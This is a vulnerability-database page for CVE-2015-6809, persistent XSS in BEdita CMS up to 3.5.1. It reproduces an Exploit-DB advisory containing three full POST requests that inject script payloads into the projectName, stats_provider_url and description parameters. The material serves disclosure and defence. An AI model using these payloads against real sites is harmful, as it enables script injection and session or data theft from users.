VIR Vulnerability Intelligence Relay

CVE-2015-6809

medium
Published 2015-09-04 · Modified 2026-05-06
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in BEdita before 3.6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cfg[projectName] parameter to index.php/admin/saveConfig, the (2) data[stats_provider_url] parameter to index.php/areas/saveArea, or the (3) data[description] parameter to index.php/areas/saveSection.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-38051 webapps php verified text · 3 KB
Sébastien Morin · 2015-09-01

Bedita 3.5.1 - Cross-Site Scripting

text exploit Source: Exploit-DB 
########################################################################################

# Title: Bedita 3.5.1 XSS vulnerabilites 
# Application: Bedita
# Version: 3.5.1
# Software Link: http://www.bedita.com/
# Date: 2015-03-09
# Author: Sébastien Morin
# Contact: https://twitter.com/SebMorin1
# Category: Web Applications

########################################################################################

===================
Introduction:
===================

BEdita is an open source web development framework that features a Content Management System (CMS) out-of-the-box.
BEdita is built upon the PHP development framework CakePHP.

(http://en.wikipedia.org/wiki/BEdita)

########################################################################################

===================
Report Timeline:
===================

2015-03-09 Vulnerabilities reported to vendor
2015-03-10 Vendor reponse
2015-03-11 Vendor confirmed
2015-08-31 Vendor releases version 3.6
2015-08-31 Advisory Release


########################################################################################

===================
Technical details:
===================


Persistent XSS:
===============

Bedita 3.5.1 contains multiples flaws that allows a persistent remote cross site scripting attack in the "cfg[projectName]", "data[stats_provider_url]" and "data[description]" parameters.
This could allow malicious users to create a specially crafted POST request that would execute arbitrary
code in a user's browser in order to gather data from them or to modify the content of the page presented to the user.


Exploits Examples:


1)cfg[projectName] parameter:

 	POST http://127.0.0.1/bedita/index.php/admin/saveConfig 
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/admin/viewConfig
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]cfg%5BprojectName%5D=<script>alert(12345)</script>[...]


2) data[stats_provider_url] parameter:

 	POST http://127.0.0.1/bedita/index.php/areas/saveArea
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveArea
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bstats_provider_url%5D="><script>alert(12345)</script>[...]


3) data[description] parameter:

	POST http://127.0.0.1/bedita/index.php/areas/saveSection
	Host: 127.0.0.1
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://127.0.0.1/bedita/index.php/areas/saveSection
	Cookie: CAKEPHP=7jviahcvolu87hdp8dqbo25jl6
	Connection: keep-alive

	[...]data%5Bdescription%5D=&lt;/textarea&gt;<script>alert(123)</script>[...]

########################################################################################

Application impact
VendorProductVersionsFixed
beditabedita{"endIncluding":"3.5.1"}

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.